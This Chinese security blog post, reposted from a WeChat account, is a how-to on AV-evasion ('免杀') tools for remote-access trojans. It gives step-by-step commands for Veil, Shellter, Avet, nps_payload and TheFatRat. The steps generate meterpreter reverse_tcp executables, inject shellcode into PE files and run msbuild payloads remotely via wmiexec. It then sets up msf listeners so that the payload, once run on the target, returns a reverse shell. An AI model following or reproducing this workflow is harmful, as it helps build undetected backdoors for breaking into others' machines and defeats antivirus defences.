几款远控免杀工具使用总结

admin 2021年12月22日00:57:35评论693 views字数 1703阅读5分40秒阅读模式

几款远控免杀工具使用总结


前言

常用后渗透过程中往往要使用msf和cs等工具的木马,而默认生成的木马非常容易被杀毒软件检出,这个时候就需要对木马进行免杀,本文介绍几款免杀工具的使用。

虽然经过杀毒软件多年更新,这些工具免杀效果可能已经很一般了,但是相比于自己写编码器解码器来做免杀更为方便简单,没有任何编程积累也可以直接使用。

veil

下载安装


docker安装veil


docker pull mattiasohlsson/veil


映射路径并运行



docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

介绍


list命令可查看其两个免杀工具,Evasion和Ordnance

  • Evasion可用于文件免杀

  • Ordnance可生成shellcode


生成msf免杀payload



进入Evasion
use 1

几款远控免杀工具使用总结


查看可用的payloads
list payloads

几款远控免杀工具使用总结


选择要使用的payloads,如选择ruby的meterpreter/rev_tcp
use 39

设置监听ip和端口
set lhost xx.xx.xx.xx
set lport 4444

几款远控免杀工具使用总结


生成可执行文件并取名test
generate
test
由于刚才配置了映射路径,可执行文件被生成在本机的/tmp/veil-output/compiled路径下,对应的msf的配置文件被生成在/tmp/veil-output/handlers路径下

在本地使用msf配置文件开启msf监听
msfconsole -r test.rc

将test.exe传入目标机器,并运行,反弹回shell


使用自定义payload生成免杀木马


使用cs的payload为例


首先在cs的界面,攻击-生成后门-payload generator-veil,保存为payload.txt

开启veil,之前步骤同上


选择13号payload
generate

在generate之后的选项中选择3号,自定义payload,然后粘贴payload.txt内容,确认生成

几款远控免杀工具使用总结

shellter

下载安装


下载windows版


https://www.shellterproject.com/download/


使用shellter注入shellcode


寻找或自行编译一个32位pe程序作为载体


打开shellter


设置注入目标pe程序


几款远控免杀工具使用总结


选择本地payload或自定义payload


L为本地
输入1选择常规的Meterpreter_Reverse_TCP


设置lhost和lport


几款远控免杀工具使用总结

成功生成免杀恶意程序

Avet

下载安装


git clone https://github.com/govolution/avet
cd avet
./setup.sh

使用Avet生成免杀文件


启动


python ./avet.py
选择要使用的payload编号

设置监听ip端口以及其他配置

生成免杀可执行文件

几款远控免杀工具使用总结

nps_payload

下载安装

git clone https://github.com/trustedsec/nps_payload
cd nps_payload/
pip install -r requirements.txt


生成



python nps_payload.py

选择1生成msf类型payload

选择payload类型

设置IP和端口

生成

几款远控免杀工具使用总结


执行

1. 本地加载执行:
- %windir%Microsoft.NETFrameworkv4.0.30319msbuild.exemsbuild_nps.xml

2. 远程文件执行:

wmiexec.py:''@cmd.exe /c start %windir%Microsoft.NETFrameworkv4.0.30319msbuild.exe \<share>msbuild_nps.xml


msf监听


msfconsole -r msbuild_nps.rc

TheFatRat

下载安装


git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat
chmod +x setup.sh
./setup.sh


运行

fatrat





END

几款远控免杀工具使用总结


本文始发于微信公众号(网络侦查研究院):几款远控免杀工具使用总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月22日00:57:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   几款远控免杀工具使用总结https://cn-sec.com/archives/452943.html

发表评论

匿名网友 填写信息